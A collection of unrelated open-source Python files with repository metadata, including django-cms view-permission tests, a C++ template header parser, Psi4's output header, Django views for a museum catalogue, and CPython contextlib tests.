u'%smaster/slave-home/pc/pg/pe/ph/' % self.get_pages_root()
)
class ModeratorSwitchCommandTest(CMSTestCase):
def test_switch_moderator_on(self):
site = get_current_site()
with force_language("en"):
pages_root = unquote(reverse("pages-root"))
page1 = create_page('page', 'nav_playground.html', 'en', published=True)
with disable_logger(log):
call_command('cms', 'moderator', 'on')
with force_language("en"):
path = page1.get_absolute_url()[len(pages_root):].strip('/')
page2 = get_page_from_path(site, path)
self.assertEqual(page1.get_absolute_url(), page2.get_absolute_url())
def test_table_name_patching(self):
"""
        This tests the plugin model patching when publishing from the command line.
"""
self.get_superuser()
create_page("The page!", "nav_playground.html", "en", published=True)
draft = Page.objects.drafts()[0]
draft.reverse_id = 'a_test' # we have to change *something*
draft.save()
add_plugin(draft.placeholders.get(slot=u"body"),
u"TextPlugin", u"en", body="Test content")
draft.publish('en')
add_plugin(draft.placeholders.get(slot=u"body"),
u"TextPlugin", u"en", body="Test content")
# Manually undoing table name patching
Text._meta.db_table = 'djangocms_text_ckeditor_text'
plugin_pool.patched = False
with disable_logger(log):
call_command('cms', 'moderator', 'on')
# Sanity check the database (we should have one draft and one public)
not_drafts = len(Page.objects.filter(publisher_is_draft=False))
drafts = len(Page.objects.filter(publisher_is_draft=True))
self.assertEqual(not_drafts, 1)
self.assertEqual(drafts, 1)
def test_switch_moderator_off(self):
site = get_current_site()
with force_language("en"):
pages_root = unquote(reverse("pages-root"))
page1 = create_page('page', 'nav_playground.html', 'en', published=True)
path = page1.get_absolute_url()[len(pages_root):].strip('/')
page2 = get_page_from_path(site, path)
self.assertIsNotNone(page2)
self.assertEqual(page1.get_absolute_url(), page2.get_absolute_url())
class ViewPermissionBaseTests(CMSTestCase):
def setUp(self):
self.page = create_page('testpage', 'nav_playground.html', 'en')
self.site = get_current_site()
def get_request(self, user=None):
attrs = {
'user': user or AnonymousUser(),
'REQUEST': {},
'POST': {},
'GET': {},
'session': {},
}
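        # type() builds a throwaway class whose class attributes stand in for
        # the request attributes the permission helpers read; a real
        # HttpRequest isn't needed at this unit-test level.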
return type('Request', (object,), attrs)
def assertViewAllowed(self, page, user=None):
if not user:
user = AnonymousUser()
self.assertTrue(user_can_view_page(user, page))
def assertViewNotAllowed(self, page, user=None):
if not user:
user = AnonymousUser()
self.assertFalse(user_can_view_page(user, page))
@override_settings(
CMS_PERMISSION=False,
CMS_PUBLIC_FOR='staff',
)
class BasicViewPermissionTests(ViewPermissionBaseTests):
"""
Test functionality with CMS_PERMISSION set to false, as this is the
normal use case
"""
@override_settings(CMS_PUBLIC_FOR="all")
def test_unauth_public(self):
request = self.get_request()
with self.assertNumQueries(0):
self.assertViewAllowed(self.page)
self.assertEqual(get_visible_nodes(request, [self.page], self.site),
[self.page])
def test_unauth_non_access(self):
request = self.get_request()
with self.assertNumQueries(0):
self.assertViewNotAllowed(self.page)
self.assertEqual(get_visible_nodes(request, [self.page], self.site),
[])
@override_settings(CMS_PUBLIC_FOR="all")
def test_staff_public_all(self):
user = self.get_staff_user_with_no_permissions()
request = self.get_request(user)
with self.assertNumQueries(0):
self.assertViewAllowed(self.page, user)
self.assertEqual(get_visible_nodes(request, [self.page], self.site),
[self.page])
def test_staff_public_staff(self):
user = self.get_staff_user_with_no_permissions()
request = self.get_request(user)
with self.assertNumQueries(0):
self.assertViewAllowed(self.page, user)
self.assertEqual(get_visible_nodes(request, [self.page], self.site),
[self.page])
def test_staff_basic_auth(self):
user = self.get_staff_user_with_no_permissions()
request = self.get_request(user)
with self.assertNumQueries(0):
self.assertViewAllowed(self.page, user)
self.assertEqual(get_visible_nodes(request, [self.page], self.site),
[self.page])
@override_settings(CMS_PUBLIC_FOR="all")
def test_normal_basic_auth(self):
user = self.get_standard_user()
request = self.get_request(user)
with self.assertNumQueries(0):
self.assertViewAllowed(self.page, user)
self.assertEqual(get_visible_nodes(request, [self.page], self.site), [self.page])
@override_settings(
CMS_PERMISSION=True,
CMS_PUBLIC_FOR='none'
)
class UnrestrictedViewPermissionTests(ViewPermissionBaseTests):
"""
Test functionality with CMS_PERMISSION set to True but no restrictions
apply to this specific page
"""
def test_unauth_non_access(self):
request = self.get_request()
with self.assertNumQueries(1):
"""
The query is:
PagePermission query for the affected page (is the page restricted?)
"""
self.assertViewNotAllowed(self.page)
self.assertEqual(get_visible_nodes(request, [self.page], self.site), [])
def test_global_access(self):
user = self.get_standard_user()
GlobalPagePermission.objects.create(can_view=True, user=user)
request = self.get_request(user)
with self.assertNumQueries(4):
"""The queries are:
PagePermission query for the affected page (is the page restricted?)
Generic django permission lookup
content type lookup by permission lookup
GlobalPagePermission query for the page site
"""
self.assertViewAllowed(self.page, user)
self.assertEqual(get_visible_nodes(request, [self.page], self.site), [self.page])
def test_normal_denied(self):
user = self.get_standard_user()
request = self.get_request(user)
with self.assertNumQueries(4):
"""
The queries are:
PagePermission query for the affected page (is the page restricted?)
GlobalPagePermission query for the page site
User permissions query
Content type query
"""
self.assertViewNotAllowed(self.page, user)
self.assertEqual(get_visible_nodes(request, [self.page], self.site), [])
@override_settings(
CMS_PERMISSION=True,
CMS_PUBLIC_FOR='all'
)
class RestrictedViewPermissionTests(ViewPermissionBaseTests):
"""
Test functionality with CMS_PERMISSION set to True and view restrictions
apply to this specific page
"""
def setUp(self):
super(RestrictedViewPermissionTests, self).setUp()
self.group = Group.objects.create(name='testgroup')
self.pages = [self.page]
self.expected = [self.page]
PagePermission.objects.create(page=self.page, group=self.group, can_view=True, grant_on=ACCESS_PAGE)
def test_unauthed(self):
request = self.get_request()
with self.assertNumQueries(1):
"""The queries are:
PagePermission query for the affected page (is the page restricted?)
"""
self.assertViewNotAllowed(self.page)
self.assertEqual(get_visible_nodes(request, self.pages, self.site), [])
def test_page_permissions(self):
user = self.get_standard_user()
request = self.get_request(user)
PagePermission.objects.create(can_view=True, user=user, page=self.page, grant_on=ACCESS_PAGE)
with self.assertNumQueries(6):
"""
The queries are:
PagePermission query (is this page restricted)
content type lookup (x2)
GlobalpagePermission query for user
TreeNode lookup
PagePermission query for this user
"""
self.assertViewAllowed(self.page, user)
self.assertEqual(get_visible_nodes(request, self.pages, self.site), self.expected)
def test_page_group_permissions(self):
user = self.get_standard_user()
user.groups.add(self.group)
request = self.get_request(user)
with self.assertNumQueries(6):
"""
The queries are:
PagePermission query (is this page restricted)
content type lookup (x2)
GlobalpagePermission query for user
TreeNode lookup
PagePermission query for user
"""
self.assertViewAllowed(self.page, user)
self.assertEqual(get_visible_nodes(request, self.pages, self.site), self.expected)
def test_global_permission(self):
user = self.get_standard_user()
GlobalPagePermission.objects.create(can_view=True, user=user)
request = self.get_request(user)
with self.assertNumQueries(4):
"""
The queries are:
PagePermission query (is this page restricted)
Generic django permission lookup
content type lookup by permission lookup
GlobalpagePermission query for user
"""
self.assertViewAllowed(self.page, user)
self.assertEqual(get_visible_nodes(request, self.pages, self.site), self.expected)
def test_basic_perm_denied(self):
user = self.get_staff_user_with_no_permissions()
request = self.get_request(user)
with self.assertNumQueries(6):
"""
The queries are:
PagePermission query (is this page restricted)
content type lookup x2
GlobalpagePermission query for user
TreeNode lookup
PagePermission query for this user
"""
self.assertViewNotAllowed(self.page, user)
self.assertEqual(get_visible_nodes(request, self.pages, self.site), [])
def test_basic_perm(self):
user = self.get_standard_user()
user.user_permissions.add(Permission.objects.get(codename='view_page'))
request = self.get_request(user)
with self.assertNumQueries(3):
"""
The queries are:
PagePermission query (is this page restricted)
Generic django permission lookup
content type lookup by permission lookup
"""
self.assertViewAllowed(self.page, user)
self.assertEqual(get_visible_nodes(request, self.pages, self.site), self.expected)
class PublicViewPermissionTests(RestrictedViewPermissionTests):
""" Run the same tests as before, but on the public page instead. """
def setUp(self):
super(PublicViewPermissionTests, self).setUp()
self.page.publish('en')
self.pages = [self.page.publisher_public]
self.expected = [self.page.publisher_public]
class GlobalPermissionTests(CMSTestCase):
def test_emulate_admin_index(self):
""" Call methods that emulate the adminsite instance's index.
This test was basically the reason for the new manager, in light of the
problem highlighted in ticket #1120, which asserts that giving a user
no site-specific rights when creating a GlobalPagePermission should
allow access to all sites.
"""
# create and then ignore this user.
superuser = self._create_user("super", is_staff=True, is_active=True,
is_superuser=True)
superuser.set_password("super")
superuser.save()
site_1 = Site.objects.get(pk=1)
site_2 = Site.objects.create(domain='example2.com', name='example2.com')
SITES = [site_1, site_2]
# create 2 staff users
USERS = [
self._create_user("staff", is_staff=True, is_active=True),
self._create_user("staff_2", is_staff=True, is_active=True),
]
for user in USERS:
user.set_password('staff')
            # re-use the same methods the UserPage form does.
            # Note that save_permissions() calls .save() internally, since we
            # haven't done so ourselves.
save_permissions({
'can_add_page': True,
'can_change_page': True,
'can_delete_page': False
}, user)
GlobalPagePermission.objects.create(can_add=True, can_change=True,
can_delete=False, user=USERS[0])
        # we're querying here to ensure that even though we've created two
        # users above, the manager successfully filters down to just one perm.
self.assertEqual(1, GlobalPagePermission.objects.with_user(USERS[0]).count())
# this will confirm explicit permissions still work, by adding the first
# site instance to the many2many relationship 'sites'
GlobalPagePermission.objects.create(can_add=True, can_change=True,
can_delete=False,
user=USERS[1]).sites.add(SITES[0])
self.assertEqual(1, GlobalPagePermission.objects.with_user(USERS[1]).count())
homepage = create_page(title="master", template="nav_playground.html",
language="en", in_navigation=True, slug='/')
publish_page(page=homepage, user=superuser, language='en')
with self.settings(CMS_PERMISSION=True):
# for all users, they should have access to site 1
request = RequestFactory().get(path='/')
request.session = {'cms_admin_site': site_1.pk}
request.current_page = None
for user in USERS:
request.user = user
# Note, the query count is inflated by doing additional lookups
# because there's a site param in the request.
with self.assertNumQueries(FuzzyInt(3,4)):
# internally this calls PageAdmin.has_[add|change|delete]_permission()
self.assertEqual({'add': True, 'change': True, 'delete': False},
site._registry[Page].get_model_perms(request))
# can't use the above loop for this test, as we're testing that
# user 1 has access, but user 2 does not, as they are only assigned
# to site 1
request = RequestFactory().get(path='/')
request.session = {'cms_admin_site': site_2.pk}
request.current_page = None
# Refresh internal user cache
USERS[0] = self.reload(USERS[0])
USERS[1] = self.reload(USERS[1])
# As before, the query count is inflated by doing additional lookups
# because there's a site param in the request
with self.assertNumQueries(FuzzyInt(5, 15)):
# this user shouldn't have access to site 2
request.user = USERS[1]
self.assertEqual({'add': False, 'change': False, 'delete': False},
site._registry[Page].get_model_perms(request))
# but, going back to the first user, they should.
request = RequestFactory().get('/', data={'site__exact': site_2.pk})
request.user = USERS[0]
request.current_page = None
request.session = {}
self.assertEqual({'add': True, 'change': True, 'delete': False},
site._registry[Page].get_model_perms(request))
def test_has_page_add_permission_with_target(self):
page = create_page('Test', 'nav_playground.html', 'en')
user = self._create_user('user')
request = RequestFactory().get('/', data={'target': page.pk})
request.session = {}
request.user = user
has_perm = site._registry[Page].has_add_permission(request)
self.assertFalse(has_perm)
|
czpython/django-cms
|
cms/tests/test_permmod.py
|
Python
|
bsd-3-clause
| 44,347 | 0.001804 |
import re
import numpy as np
def identify_templates(hfile):
"""
Parameters
----------
hfile : string
.h header file to be parsed
Returns
-------
tdict : dictionary
dictionary of lists
each dictionary is a function
each list identifies the arglist
Notes
-----
The header looks for
template <class I, class T>
void myfunc(const I n, const T a, const T * x, T * y){
...
}
rules:
- 'template' identifies the start of a templated function
- the argument list is limited to
- I: int array
- T: data array
- if *, then pointer type
else, scalar
- multiples of the same type look like I1, I2, ...
- in addition 'const' and 'void'
- in addition operators of the form OP&
- then it makes i, I, t, T, depending on type
"""
types = ['i', 'I', 't', 'T']
    with open(hfile, 'r') as hfid:  # universal newlines are the default in text mode; 'rU' is deprecated
text = hfid.read()
    temp_iter = re.finditer(r'template\s*<', text)
temp_start = [m.start(0) for m in temp_iter]
docst_iter = re.finditer(r'//\s*begin{docstring}', text)
docst_start = [m.start(0) for m in docst_iter]
docst_iter = re.finditer(r'//\s*end{docstring}', text)
docst_end = [m.start(0) for m in docst_iter]
# check begin and end docstrings
if len(docst_start) != len(docst_end):
raise ValueError('Problem with docstring begin{docstring} ' +
'or end{docstring}')
    # every docstring is associated with some template, but not every
    # template has a docstring; associate templates with docstrings where
    # possible (from the docstring's point of view)
temp_start = np.array(temp_start)
docst = ['' for t in range(len(temp_start))]
cppcomment = re.compile('^//')
for ms, me in zip(docst_start, docst_end):
if ms >= me:
raise ValueError('Problem with docstring begin{docstring} ' +
'or end{docstring}')
docid = np.where(ms < temp_start)[0][0]
docstring = text[ms:me].splitlines()
pdocstring = []
for d in docstring[1:]: # not the first line
pdocstring.append(cppcomment.sub('', d))
docst[docid] = '\n'.join(pdocstring)
    classre = re.compile(r'template.*<(.+?)>')
    funcre = re.compile(r'template\s*<.*?>(.+?){', re.DOTALL)
    argsre = re.compile(r'(.+?)\s+(.+?)\s*\((.*?)\)', re.DOTALL)
tidre = re.compile('([%s])' % ''.join(types) + '([0-9]+)')
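    # What each pattern captures (descriptive notes, not in the original):
    #   classre -> the template parameter list, e.g. 'class I, class T'
    #   funcre  -> the declaration between the template<...> and the brace
    #   argsre  -> splits a declaration into (return type, name, arg list)
    #   tidre   -> numbered type ids such as I1 or T2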
funcs = []
print('[identify_templates] ...parsing %s' % hfile)
k = 0
for tstart in temp_start:
# class list
classes = classre.search(text, tstart).group(1).strip()
# function call
funccall = funcre.search(text, tstart).group(1).strip()
# check classes
classes = re.sub('class', '', classes)
classes = re.sub('typename', '', classes)
        classes = re.sub(r'\s', '', classes).split(',')
for tid in classes:
if len(tid) == 1:
thistype = tid
else:
m = tidre.match(tid)
thistype = m.group(1).strip()
thisnum = m.group(2).strip()
del thisnum
if thistype not in types:
raise ValueError('class type \'%s\' not supported' % thistype +
' in your header file %s' % hfile)
# get the function declaration
m = argsre.match(funccall)
funcret = m.group(1).strip()
funcname = m.group(2).strip()
funcargs = m.group(3).strip()
args = funcargs.split(',')
# mark args, const, type
if len(args[0]) == 0:
args = []
const = []
atype = []
for arg in args:
if 'const ' in arg:
const.append(True)
else:
const.append(False)
arg = arg.replace('const', '').strip()
if ('*' in arg) or ('[]' in arg):
atype.append(arg[0].upper())
else:
atype.append(arg[0].lower())
if funcret == 'void':
spec = 'v'
else:
spec = funcret
for c, t in zip(const, atype):
if c:
spec += t
else:
spec += '*' + t
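        # Worked example (illustrative, matching the docstring header):
        # myfunc(const I n, const T a, const T * x, T * y) gives
        # const=[True, True, True, False] and atype=['i', 't', 'T', 'T'],
        # so spec == 'v' + 'i' + 't' + 'T' + '*T' == 'vitT*T'.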
funcs.append({'func': funcname, 'const': const, 'atype': atype,
'ret': funcret, 'spec': spec,
'docstring': docst[k]})
print('\t...found %s(...)' % funcname)
k += 1
return funcs
if __name__ == '__main__':
import sys
if len(sys.argv) == 1:
import os
temps = os.listdir('./templates')
example_templates = [h for h in temps
if (h.startswith('example') and h.endswith('.h'))]
example_templates = ['example.h']
        # identify_templates() parses a single header path, so walk the
        # example headers one at a time
        funcs = []
        for h in example_templates:
            funcs.extend(identify_templates(os.path.join('./templates', h)))
else:
f = sys.argv[1]
funcs = identify_templates(f)
for func in funcs:
print(func['func'])
print(' %s' % func['spec'])
|
lukeolson/crappy
|
utils.py
|
Python
|
bsd-3-clause
| 5,160 | 0.00155 |
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
dependencies = [
('projects', '0010_product_design_format'),
]
operations = [
migrations.AlterField(
model_name='product',
name='design',
field=models.TextField(null=True, blank=True),
),
]
|
GETLIMS/LIMS-Backend
|
lims/projects/migrations/0011_auto_20160822_1527.py
|
Python
|
mit
| 415 | 0 |
#
# @BEGIN LICENSE
#
# Psi4: an open-source quantum chemistry software package
#
# Copyright (c) 2007-2017 The Psi4 Developers.
#
# The copyrights for code used from other parties are included in
# the corresponding files.
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License along
# with this program; if not, write to the Free Software Foundation, Inc.,
# 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
#
# @END LICENSE
#
import datetime
import os
from . import core
from .metadata import __version__, version_formatter
time_string = datetime.datetime.now().strftime('%A, %d %B %Y %I:%M%p')
pid = os.getpid()
def sizeof_fmt(num, suffix='B'):
for unit in ['','Ki','Mi','Gi','Ti','Pi','Ei','Zi']:
if abs(num) < 1024.0:
return "%3.1f %s%s" % (num, unit, suffix)
num /= 1024.0
return "%.1f %s%s" % (num, 'Yi', suffix)
def print_header():
driver_info = version_formatter("""{version} {release}""")
git_info = version_formatter("""{{{branch}}} {githash} {clean}""")
datadir = core.get_environment("PSIDATADIR")
memory = sizeof_fmt(core.get_memory())
threads = str(core.get_num_threads())
header = """
-----------------------------------------------------------------------
Psi4: An Open-Source Ab Initio Electronic Structure Package
Psi4 %s
Git: Rev %s
R. M. Parrish, L. A. Burns, D. G. A. Smith, A. C. Simmonett,
A. E. DePrince III, E. G. Hohenstein, U. Bozkaya, A. Yu. Sokolov,
R. Di Remigio, R. M. Richard, J. F. Gonthier, A. M. James,
H. R. McAlexander, A. Kumar, M. Saitow, X. Wang, B. P. Pritchard,
P. Verma, H. F. Schaefer III, K. Patkowski, R. A. King, E. F. Valeev,
F. A. Evangelista, J. M. Turney, T. D. Crawford, and C. D. Sherrill,
submitted.
-----------------------------------------------------------------------
Psi4 started on: %s
Process ID: %6d
PSIDATADIR: %s
Memory: %s
Threads: %s
""" % (driver_info, git_info, time_string, pid, datadir, memory, threads)
core.print_out(header)
|
kratman/psi4public
|
psi4/header.py
|
Python
|
gpl-2.0
| 2,628 | 0.003425 |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import datetime
from dateutil import relativedelta
from django.contrib.auth.decorators import login_required
from django.shortcuts import render, redirect
from django.db.models import Q, Count
from django_tables2 import RequestConfig
from osnovni.forms import PredmetForm, PredmetSearchForm
from osnovni.models import *
from osnovni.tables import *
@login_required
def index(request):
return render(request, 'osnovni/index.html')
@login_required
def novi_predmet(request):
if request.method == 'POST':
form = PredmetForm(request.POST, request.FILES)
if form.is_valid():
pred = form.save()
ist = IstorijaIzmenaPredmeta()
ist.predmet = pred
ist.radnik = request.user.radnik
ist.timestamp = datetime.datetime.now()
ist.save()
return redirect('index')
else:
print(form.errors)
else:
form = PredmetForm(initial={'kreirao': request.user.radnik, 'datum_kreiranja': datetime.date.today()})
context = {'form': form,
'pagetitle': u'Novi karton',
'maintitle': u'Novi karton',
'titleinfo': u'Kreiranje novog kartona',
'form_mode': 'new'}
return render(request, 'osnovni/predmet.html', context)
@login_required
def predmet(request, predmet_id):
try:
pred = MuzejskiPredmet.objects.get(pk=predmet_id)
except MuzejskiPredmet.DoesNotExist:
return redirect('index')
template = 'osnovni/predmet.html'
context = {}
context['pagetitle'] = u'Pregled kartona'
context['maintitle'] = u'Pregled kartona'
context['titleinfo'] = u'Pregled podataka u kartonu inv.br. ' + str(pred.inv_broj)
context['form_mode'] = 'edit'
if request.method == 'POST':
form = PredmetForm(request.POST, request.FILES, instance=pred)
if form.is_valid():
pred = form.save()
ist = IstorijaIzmenaPredmeta()
ist.predmet = pred
ist.radnik = request.user.radnik
ist.timestamp = datetime.datetime.now()
ist.save()
return redirect('index')
else:
print(form.errors)
else:
form = PredmetForm(instance=pred)
if request.user.radnik.uloga.id > 2:
context['predmet'] = pred
context['titleinfo'] = u'Pregled podataka u kartonu inv.br. ' + str(pred.inv_broj)
template = 'osnovni/predmet_view.html'
istorija = IstorijaIzmenaPredmeta.objects.filter(predmet=pred).order_by('timestamp')
table = PredmetHistoryList(istorija)
RequestConfig(request, paginate={'per_page': 20}).configure(table)
context['form'] = form
context['table'] = table
return render(request, template, context)
@login_required
def pretraga(request):
if request.method == 'POST':
form = PredmetSearchForm(request.POST)
if form.is_valid():
query = None
query_desc = ''
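            # Each filled-in form field below contributes one Q object; the
            # Q objects are AND-ed together, while query_desc accumulates a
            # human-readable summary of the active filters for the results page.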
inv_br = form.cleaned_data['inv_br']
if inv_br is not None and inv_br != '':
q = Q(inv_broj=inv_br)
query = query & q if query is not None else q
query_desc += ' inv.br:' + str(inv_br)
vrsta_predmeta = form.cleaned_data['vrsta_predmeta']
if vrsta_predmeta is not None and vrsta_predmeta != '':
q = Q(vrsta_predmeta__icontains=vrsta_predmeta)
query = query & q if query is not None else q
query_desc += ' predmet:' + vrsta_predmeta
vrsta_zbirke = form.cleaned_data['vrsta_zbirke']
if vrsta_zbirke is not None:
q = Q(vrsta_zbirke_id=vrsta_zbirke.id)
query = query & q if query is not None else q
query_desc += ' zbirka:' + vrsta_zbirke.naziv
vreme_nastanka = form.cleaned_data['vreme_nastanka']
if vreme_nastanka is not None and vreme_nastanka != '':
q = Q(vreme_nastanka__icontains=vreme_nastanka)
query = query & q if query is not None else q
query_desc += ' vreme:' + vreme_nastanka
datum_nastanka1 = form.cleaned_data['datum_nastanka1']
if datum_nastanka1 is not None:
q = Q(datum_nastanka__gte=datum_nastanka1)
query = query & q if query is not None else q
query_desc += ' od:' + datetime.date.strftime(datum_nastanka1, '%d.%m.%Y.')
datum_nastanka2 = form.cleaned_data['datum_nastanka2']
if datum_nastanka2 is not None:
q = Q(datum_nastanka__lte=datum_nastanka2)
query = query & q if query is not None else q
query_desc += ' do:' + datetime.date.strftime(datum_nastanka2, '%d.%m.%Y.')
mesto_nastanka = form.cleaned_data['mesto_nastanka']
if mesto_nastanka is not None:
q = Q(mesto_nastanka2=mesto_nastanka)
query = query & q if query is not None else q
query_desc += ' mesto:' + mesto_nastanka.naziv
autor = form.cleaned_data['autor']
if autor is not None and autor != '':
q = Q(autor__icontains=autor)
query = query & q if query is not None else q
query_desc += ' autor:' + autor
opis = form.cleaned_data['opis']
if opis is not None and opis != '':
q = Q(opis__icontains=opis)
query = query & q if query is not None else q
query_desc += ' opis:' + opis
kategorija = form.cleaned_data['kategorija']
if kategorija is not None:
q = Q(kategorija=kategorija)
query = query & q if query is not None else q
query_desc += ' kat:' + kategorija.naziv
obradio = form.cleaned_data['obradio']
if obradio is not None and obradio != '':
q = Q(obradio__icontains=obradio)
query = query & q if query is not None else q
query_desc += ' obradio:' + obradio
uneo = form.cleaned_data['uneo']
if uneo is not None:
q = Q(kreirao=uneo)
query = query & q if query is not None else q
query_desc += ' uneo:' + uneo.puno_ime()
datum_unosa1 = form.cleaned_data['datum_unosa1']
if datum_unosa1 is not None:
q = Q(datum_kreiranja__gte=datum_unosa1)
query = query & q if query is not None else q
query_desc += ' unos_od:' + datetime.date.strftime(datum_unosa1, '%d.%m.%Y.')
datum_unosa2 = form.cleaned_data['datum_unosa2']
if datum_unosa2 is not None:
q = Q(datum_kreiranja__lte=datum_unosa2)
query = query & q if query is not None else q
query_desc += ' unos_do:' + datetime.date.strftime(datum_unosa2, '%d.%m.%Y.')
if query is None:
predmeti = MuzejskiPredmet.objects.all()
else:
predmeti = MuzejskiPredmet.objects.filter(query).distinct()
return _prikazi_predmete(request, predmeti, u'Pretraga kartona', u'Rezultati pretrage', query_desc)
else:
form = PredmetSearchForm()
context = {'form': form,
'pagetitle': u'Pretraga kartona',
'maintitle': u'Pretraga kartona',
'titleinfo': u'Unesite poznate podatke'}
return render(request, 'osnovni/pretraga.html', context)
@login_required
def moji_predmeti(request):
predmeti = MuzejskiPredmet.objects.filter(kreirao=request.user.radnik)
return _prikazi_predmete(request, predmeti, u'Moji kartoni', u'Moji kartoni', u'korisnika ' + request.user.username)
def _prikazi_predmete(request, predmeti, pagetitle, maintitle, titleinfo):
table = PredmetList(predmeti)
RequestConfig(request, paginate={'per_page': 20}).configure(table)
context = {'table': table,
'pagetitle': pagetitle,
'maintitle': maintitle,
'titleinfo': titleinfo}
return render(request, 'osnovni/predmet_list.html', context)
@login_required
def statistika_unosa(request):
danas = datetime.date.today()
minus6 = danas - relativedelta.relativedelta(months=6)
radnici = Radnik.objects.annotate(br_kartona=Count('muzejskipredmet')).\
filter(muzejskipredmet__datum_kreiranja__gte=minus6).\
filter(muzejskipredmet__datum_kreiranja__lte=danas)
table = RadniciList(radnici)
RequestConfig(request, paginate={'per_page': 20}).configure(table)
context = {
'table': table,
'pagetitle': u'Statistika unosa',
'maintitle': u'Statistika unosa',
'titleinfo': u'za period od ' + datetime.date.strftime(minus6, '%d.%m.%Y.') + u' do ' +
datetime.date.strftime(danas, '%d.%m.%Y.')
}
return render(request, 'osnovni/statistika_unosa.html', context)
@login_required
def inventarna_knjiga(request, od=1, do=1000000):
predmeti = MuzejskiPredmet.objects.filter(inv_broj__gte=od).filter(inv_broj__lte=do).order_by('inv_broj')
table = InvKnjiga(predmeti)
RequestConfig(request, paginate={'per_page': 20}).configure(table)
context = {'table': table, 'od': od, 'do': do, 'cela': (od == 1 and do == 1000000)}
return render(request, 'osnovni/inventarna_knjiga.html', context)
|
mbranko/kartonpmv
|
osnovni/views.py
|
Python
|
mit
| 9,507 | 0.001367 |
import copy
from wpm.filelist import *
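# Ad-hoc smoke test (not a unittest): copy.copy() makes a shallow copy of a
# loaded filelist; the copy is sorted while the original is randomized, and
# get_list() is called on both so the effect on any shared internal state can
# be inspected by eye before both handles are closed.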
f = filelist()
f.load("/home/kman/bin/wpm")
f.get_list()
p = copy.copy(f)
p.sort()
f.randomize()
p.get_list()
f.get_list()
p.close()
f.close()
|
cristicalin/setwall
|
junk/test_copy.py
|
Python
|
gpl-3.0
| 181 | 0.005525 |
from distutils.core import setup, Extension
setup (name = "win32ver",
       version = "1.0",
       maintainer = "Jeong Wook Oh",
       maintainer_email = "oh.jeongwook@gmail.com",
       description = "Win32 Version Information Retriever",
       # 'platforms' is a setup() option, not an Extension option; distutils
       # would only warn and ignore it if passed to Extension
       platforms = ['x86'],
       ext_modules = [ Extension('win32ver',
                                 sources = ['win32ver.cpp'],
                                 libraries = ['version']) ]
       )
|
jenix21/DarunGrim
|
Src/Scripts/FileManagement/setup.py
|
Python
|
bsd-3-clause
| 361 | 0.108033 |
"""Unit tests for contextlib.py, and other context managers."""
import sys
import tempfile
import unittest
from contextlib import * # Tests __all__
from test import support
try:
import threading
except ImportError:
threading = None
class ContextManagerTestCase(unittest.TestCase):
def test_contextmanager_plain(self):
state = []
@contextmanager
def woohoo():
state.append(1)
yield 42
state.append(999)
with woohoo() as x:
self.assertEqual(state, [1])
self.assertEqual(x, 42)
state.append(x)
self.assertEqual(state, [1, 42, 999])
def test_contextmanager_finally(self):
state = []
@contextmanager
def woohoo():
state.append(1)
try:
yield 42
finally:
state.append(999)
with self.assertRaises(ZeroDivisionError):
with woohoo() as x:
self.assertEqual(state, [1])
self.assertEqual(x, 42)
state.append(x)
raise ZeroDivisionError()
self.assertEqual(state, [1, 42, 999])
def test_contextmanager_no_reraise(self):
@contextmanager
def whee():
yield
ctx = whee()
ctx.__enter__()
# Calling __exit__ should not result in an exception
self.assertFalse(ctx.__exit__(TypeError, TypeError("foo"), None))
def test_contextmanager_trap_yield_after_throw(self):
@contextmanager
def whoo():
try:
yield
except:
yield
ctx = whoo()
ctx.__enter__()
self.assertRaises(
RuntimeError, ctx.__exit__, TypeError, TypeError("foo"), None
)
def test_contextmanager_except(self):
state = []
@contextmanager
def woohoo():
state.append(1)
try:
yield 42
except ZeroDivisionError as e:
state.append(e.args[0])
self.assertEqual(state, [1, 42, 999])
with woohoo() as x:
self.assertEqual(state, [1])
self.assertEqual(x, 42)
state.append(x)
raise ZeroDivisionError(999)
self.assertEqual(state, [1, 42, 999])
def _create_contextmanager_attribs(self):
def attribs(**kw):
def decorate(func):
for k,v in kw.items():
setattr(func,k,v)
return func
return decorate
@contextmanager
@attribs(foo='bar')
def baz(spam):
"""Whee!"""
return baz
def test_contextmanager_attribs(self):
baz = self._create_contextmanager_attribs()
self.assertEqual(baz.__name__,'baz')
self.assertEqual(baz.foo, 'bar')
@unittest.skipIf(sys.flags.optimize >= 2,
"Docstrings are omitted with -O2 and above")
def test_contextmanager_doc_attrib(self):
baz = self._create_contextmanager_attribs()
self.assertEqual(baz.__doc__, "Whee!")
class ClosingTestCase(unittest.TestCase):
# XXX This needs more work
def test_closing(self):
state = []
class C:
def close(self):
state.append(1)
x = C()
self.assertEqual(state, [])
with closing(x) as y:
self.assertEqual(x, y)
self.assertEqual(state, [1])
def test_closing_error(self):
state = []
class C:
def close(self):
state.append(1)
x = C()
self.assertEqual(state, [])
with self.assertRaises(ZeroDivisionError):
with closing(x) as y:
self.assertEqual(x, y)
1 / 0
self.assertEqual(state, [1])
class FileContextTestCase(unittest.TestCase):
def testWithOpen(self):
tfn = tempfile.mktemp()
try:
f = None
with open(tfn, "w") as f:
self.assertFalse(f.closed)
f.write("Booh\n")
self.assertTrue(f.closed)
f = None
with self.assertRaises(ZeroDivisionError):
with open(tfn, "r") as f:
self.assertFalse(f.closed)
self.assertEqual(f.read(), "Booh\n")
1 / 0
self.assertTrue(f.closed)
finally:
support.unlink(tfn)
@unittest.skipUnless(threading, 'Threading required for this test.')
class LockContextTestCase(unittest.TestCase):
def boilerPlate(self, lock, locked):
self.assertFalse(locked())
with lock:
self.assertTrue(locked())
self.assertFalse(locked())
with self.assertRaises(ZeroDivisionError):
with lock:
self.assertTrue(locked())
1 / 0
self.assertFalse(locked())
def testWithLock(self):
lock = threading.Lock()
self.boilerPlate(lock, lock.locked)
def testWithRLock(self):
lock = threading.RLock()
self.boilerPlate(lock, lock._is_owned)
def testWithCondition(self):
lock = threading.Condition()
def locked():
return lock._is_owned()
self.boilerPlate(lock, locked)
def testWithSemaphore(self):
lock = threading.Semaphore()
def locked():
if lock.acquire(False):
lock.release()
return False
else:
return True
self.boilerPlate(lock, locked)
